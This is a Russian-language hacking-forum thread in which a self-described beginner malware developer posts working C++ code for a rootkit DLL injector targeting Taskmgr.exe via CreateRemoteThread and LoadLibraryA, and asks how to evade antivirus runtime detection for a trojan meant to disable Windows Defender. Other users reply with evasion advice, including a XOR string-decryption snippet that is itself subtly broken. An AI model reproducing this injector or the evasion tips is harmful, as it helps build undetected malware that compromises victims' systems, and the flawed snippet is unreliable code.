RootKIT инжектор, рантайм детект, как фиксить?

JOHR · 02.04.2025

Всем привет, столкнулся с проблемой при разработке инжектора для руткита на 3 кольце, скантайм не детектит, рантайт детект, как можно это исправить?

Хоть мой троян подразумевает изначально убивать вд или добавляться в исключения, не хочется видеть детекты, в заранее спасибо(не судите строго, начинающий в разработке малвари)

C++:

#include <iostream>
#include "Windows.h"
#include <tlhelp32.h>

DWORD GetProcessID(const wchar_t* processName) {
    PROCESSENTRY32 entry;
    entry.dwSize = sizeof(PROCESSENTRY32);
    HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

    if (snapshot == INVALID_HANDLE_VALUE)
        return 0;

    DWORD pid = 0;
    if (Process32First(snapshot, &entry)) {
        do {
            if (_wcsicmp(entry.szExeFile, processName) == 0) {
                pid = entry.th32ProcessID;
                break;
            }
        } while (Process32Next(snapshot, &entry));
    }

    CloseHandle(snapshot);
    return pid;
}

int main()
{
    int processPID;
    const wchar_t* processName = L"Taskmgr.exe"; // Имя процесса
    DWORD pid = GetProcessID(processName);
    
    processPID = pid;
    

    char DLL[260] = "C:\\ProgramData\\Freedom\\$pwnFreedom.dll";
    HANDLE HMODULE = OpenProcess(PROCESS_ALL_ACCESS, 0, processPID);
    LPVOID AllocAddress = VirtualAllocEx(HMODULE, nullptr, 260, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    WriteProcessMemory(HMODULE, AllocAddress, DLL, 260, nullptr);
    CreateRemoteThread(HMODULE, nullptr, 0, LPTHREAD_START_ROUTINE(LoadLibraryA), AllocAddress, 0, nullptr);

}

Apocalypse · 06.04.2025

Название детекта бы написал, а так метод то задроченный, явно у АВ стоят хуки на эти апишки.

CryptNeeded · 06.04.2025

Alot of issues which I understand is one of them is Hardcoded Path Visibility The DLL path (C:\\ProgramData\\Freedom\\$pwnFreedom.dll) is hardcoded in plaintext. Security software often scans for suspicious strings like DLL paths in memory

Direct Use of LoadLibraryA
If you read my articles on evasion I already teach there LoadLibraryA is a well known api which will be utilised to hook by edr or avs to monitor the dll loading

The code him self doesn't have any obfuscation even if you are an beginner use the anti malware detection techniques

And the process which you targeted Taskmgr.exe in injection is an already suspicious in nature also you don't have proper Error handling single error will cause an whole program crash
the tip i have for you is Store the DLL path encrypted in the binary and decrypt it at runtime
void decrypt(char* data, size_t len, char key) {
for (size_t i = 0; i < len; i++) {
data ^= key;
}
}

int main() {
char encryptedDLL[] = { /* XOR-encrypted bytes of "C:\\ProgramData\\Freedom\\$pwnFreedom.dll" */ };
decrypt(encryptedDLL, sizeof(encryptedDLL), 0x55); // Decrypt with key 0x55
// Use decryptedDLL instead of hardcoded DLL
}

RootKIT инжектор, рантайм детект, как фиксить?

JOHR

HDD-drive

Apocalypse

CPU register

CryptNeeded

RAID-массив